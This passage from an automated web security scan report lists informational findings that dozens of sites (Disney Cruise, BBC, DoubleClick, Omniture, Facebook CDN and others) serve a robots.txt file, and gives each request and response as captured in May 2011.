Host:	http://dcl.wdpromedia.com
Path:	/services/en_US/htmlQQ/jsQuickQuote

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dcl.wdpromedia.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 30 Apr 2011 18:26:42 GMT
Content-Type: text/plain
Content-Length: 2113
Date: Mon, 16 May 2011 01:24:39 GMT
Connection: close

User-agent: *

# Disney Cruise Line Excludes
Disallow: /dcl/en_US/_lib/
Disallow: /dcl/_global/modules/
Disallow: /dcl/_lib/
Disallow: /dcl/system/
Disallow: /dcl/myCruise/myProfile/system/
Di
...[SNIP]...

27.22. http://dcl2.wdpromedia.com/concat/4.39.1.5/css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/concat/4.39.1.5/css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dcl2.wdpromedia.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 30 Apr 2011 18:26:42 GMT
Content-Type: text/plain
Content-Length: 2113
Date: Mon, 16 May 2011 01:23:40 GMT
Connection: close

User-agent: *

# Disney Cruise Line Excludes
Disallow: /dcl/en_US/_lib/
Disallow: /dcl/_global/modules/
Disallow: /dcl/_lib/
Disallow: /dcl/system/
Disallow: /dcl/myCruise/myProfile/system/
Di
...[SNIP]...

27.23. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: disneycruise.disney.go.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 30 Apr 2011 18:26:42 GMT
Content-Type: text/plain
Content-Length: 2113
Date: Mon, 16 May 2011 01:35:40 GMT
Connection: close

User-agent: *

# Disney Cruise Line Excludes
Disallow: /dcl/en_US/_lib/
Disallow: /dcl/_global/modules/
Disallow: /dcl/_lib/
Disallow: /dcl/system/
Disallow: /dcl/myCruise/myProfile/system/
Di
...[SNIP]...

27.24. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=16
Expires: Sun, 15 May 2011 21:19:20 GMT
Date: Sun, 15 May 2011 21:19:04 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

27.25. http://feeds.delicious.com/v2/json/urlinfo/data previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.delicious.com
Path:	/v2/json/urlinfo/data

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 01:25:00 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 01:25:00 GMT
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 1236
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.4

User-agent: *
Disallow: /

User-agent: delicious-thumbnails
Allow: /

User-agent: Slurp
Allow: /
Disallow: /inbox
Disallow: /subscriptions
Disallow: /network
Disallow: /search
Disallow: /post
Disall
...[SNIP]...

27.26. http://fingerhut-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fingerhut-www.baynote.net
Path:	/baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fingerhut-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1305507005000"
Last-Modified: Mon, 16 May 2011 00:50:05 GMT
Content-Type: text/plain
Content-Length: 216
Date: Mon, 16 May 2011 01:33:14 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

27.27. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fingerhut.tt.omtrdc.net
Path:	/m2/fingerhut/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fingerhut.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"25-1299290853000"
Accept-Ranges: bytes
Content-Length: 25
Date: Mon, 16 May 2011 01:33:10 GMT
Connection: close
Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

27.28. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 15 May 2011 20:26:48 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

27.29. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/809051/0/-1/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

27.30. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1034849195/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 15 May 2011 21:31:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

27.31. http://gs.instantservice.com/geoipAPI.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gs.instantservice.com
Path:	/geoipAPI.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:23 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 14:41:56 GMT
ETag: "3bbaa-1a-3ef0b500"
Accept-Ranges: bytes
Content-Length: 26
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

27.32. http://https.edge.ru4.com/smartserve/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://https.edge.ru4.com
Path:	/smartserve/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: https.edge.ru4.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1190051510000"
Last-Modified: Mon, 17 Sep 2007 17:51:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 16 May 2011 01:38:36 GMT
Connection: close

User-agent: *
Disallow: /

27.33. http://i.usatoday.net/asp/usatly/handler.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/asp/usatly/handler.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 16 May 2011 01:19:46 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

27.34. http://images.scanalert.com/meter/www.mcafee.com/55.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.scanalert.com
Path:	/meter/www.mcafee.com/55.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Pnr"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 44
Date: Mon, 16 May 2011 01:39:43 GMT
Connection: close
Cache-Control: private

# Allow Everything
User-agent: *
Disallow:

27.35. http://imawow.weather.com/web/common/wxicons/36/26.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imawow.weather.com
Path:	/web/common/wxicons/36/26.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imawow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:59 GMT
Server: Apache
SVRNAME: web1x06
Last-Modified: Wed, 19 Sep 2007 14:46:16 GMT
Accept-Ranges: bytes
Content-Length: 206
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7478
Connection: Keep-Alive
Content-Type: text/plain

# /robots.txt
User-agent: *
Disallow: /cgi-bin
Disallow: /fcgi-bin
Disallow: /interact/photogallery/results.html
Disallow: /interact/photogallery/details.html
Disallow: /RealMedia
Disallow: /search/pa
...[SNIP]...

27.36. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 11:30:25 GMT
ETag: "cc0d3a-1b-4a1f8e226d640"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 01:25:43 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

27.37. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:38:30 GMT
Server: Apache
X-Name: dmc-o01
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500070-a2-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

27.38. http://metrics.fingerhut.com/b/ss/fingerhutcomprod/1/H.21/s03779584402218 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.fingerhut.com
Path:	/b/ss/fingerhutcomprod/1/H.21/s03779584402218

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.fingerhut.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:35 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1d516e-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www321
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.39. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s06847484195604 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.mcafee.com
Path:	/b/ss/mcafeecomglobal/1/H.21/s06847484195604

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:52 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "115104-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www82
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.40. http://metrics.sonystyle.com/b/ss/sonysonystyle2007prod/1/H.19.4/s95522347362719 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.sonystyle.com
Path:	/b/ss/sonysonystyle2007prod/1/H.19.4/s95522347362719

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.sonystyle.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:00 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "58178-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www618
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.41. http://metrics.us.playstation.com/b/ss/sceablogsprod/1/H.20.3/s87736232713796 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.us.playstation.com
Path:	/b/ss/sceablogsprod/1/H.20.3/s87736232713796

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.us.playstation.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "3a02e-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www16
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:12:05 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=86906478
Expires: Fri, 14 Feb 2014 18:00:21 GMT
Date: Sun, 15 May 2011 21:19:03 GMT
Connection: close

User-agent: *
Disallow: /

27.43. http://nexus2.ensighten.com/sony/serverComponent.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nexus2.ensighten.com
Path:	/sony/serverComponent.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nexus2.ensighten.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:10 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:42:59 GMT
ETag: "4b9e5-1a-49793ce00fac0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.44. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1286979798000"
Last-Modified: Wed, 13 Oct 2010 14:23:18 GMT
Content-Type: text/plain
Content-Length: 30
Date: Mon, 16 May 2011 01:19:53 GMT
Connection: close

User-agent: *
Disallow: /

27.45. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:19:52 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

27.46. http://pastebin.com/trends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pastebin.com
Path:	/trends

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pastebin.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:45 GMT
Content-Type: text/plain
Content-Length: 178
Last-Modified: Sun, 06 Mar 2011 10:57:33 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /download.php
Disallow: /report.php
Disallow: /raw.php
Disallow: /embed.php
Disallow: /embed_iframe.php
Disallow: /embed_js.php
Disallow: /diff.php

27.47. http://pixel.invitemedia.com/pubmatic_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/pubmatic_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:19:50 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

27.48. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:19:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

27.49. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 15 May 2011 20:26:59 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

27.50. http://rs.instantservice.com/resources/smartbutton/7470/II3_Servers.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.instantservice.com
Path:	/resources/smartbutton/7470/II3_Servers.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:46 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 14:43:25 GMT
ETag: "1a-443ebd40"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

27.51. http://s7.addthis.com/js/250/addthis_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.addthis.com
Path:	/js/250/addthis_widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 11:30:25 GMT
ETag: "cc0d3a-1b-4a1f8e226d640"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 01:19:42 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

27.52. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secureshopping.mcafee.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
ETag: "CdLEBc9iPaz"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 497
Date: Mon, 16 May 2011 01:39:53 GMT

User-agent: *
Disallow: /js/
Disallow: /css/
Disallow: /error/
Disallow: /shop/*?brand=*
Disallow: /shop/*?merchant=*
Disallow: /shop/*?rating=*
Disallow: /shop/*?priceMin=*
Disallow: /shop/*?
...[SNIP]...

27.53. http://serv.adspeed.com/ad.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serv.adspeed.com
Path:	/ad.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: serv.adspeed.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 24 Apr 2009 00:08:03 GMT
Content-Length: 153
Connection: close
Date: Mon, 16 May 2011 01:20:33 GMT
Server: AdSpeed/s5

User-agent: *
Disallow: /fw/
Disallow: /as/
Disallow: /ad.php
Disallow: /Users/checkUserNameAJAX.xml
Sitemap: http://www.adspeed.com/Helps/xmlsitemap.xml

27.54. http://sony.links.channelintelligence.com/pages/prices.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sony.links.channelintelligence.com
Path:	/pages/prices.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sony.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:2dd2"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Sun, 15 May 2011 20:26:33 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

27.55. http://sony.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sony.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sony.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:2dd2"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Sun, 15 May 2011 20:26:47 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

27.56. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sony.tt.omtrdc.net
Path:	/m2/sony/mbox/ajax

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sony.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"25-1299290853000"
Accept-Ranges: bytes
Content-Length: 25
Date: Sun, 15 May 2011 21:19:59 GMT
Connection: close
Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

27.57. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/sc/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sonycomputerentertai.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"25-1299290853000"
Accept-Ranges: bytes
Content-Length: 25
Date: Sun, 15 May 2011 20:26:46 GMT
Connection: close
Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

27.58. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Sun, 15 May 2011 20:27:09 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

27.59. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.bhphotovideo.com
Path:	/FrameWork/css/min/reset-fonts-layout.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT
ETag: "491-4d9fcd27"
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:42:38 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

27.60. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2218 8728
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

27.61. http://t.invitemedia.com/track_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/track_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:26:58 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

27.62. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/201/unitedstates/728x90/ros

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Thu, 12 May 2011 13:43:17 GMT
ETag: "4cc899-1a-4a3145f192740"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 01:19:51 GMT
Connection: close

User-agent: *
Disallow: /

27.63. http://tag.contextweb.com/TagPublish/getjs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.contextweb.com

Response

HTTP/1.0 200 OK
Content-Length: 135
Content-Type: text/plain
Last-Modified: Wed, 07 Feb 2007 15:35:46 GMT
Accept-Ranges: bytes
ETag: "18b4e0a2cd4ac71:351d"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:19:49 GMT
Connection: close

User-agent: *
Allow: /Corporate/
Disallow: /TagPublish/
Disallow: /xt2/
Disallow: /rt1/
Disallow: /CWClick/
Disallow: /ContextAd/

27.64. http://travel.travelocity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://travel.travelocity.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: travel.travelocity.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:30:06 GMT
Server: Apache
Last-Modified: Fri, 30 Oct 2009 13:04:04 GMT
ETag: "1436b-cb-a98e9900"
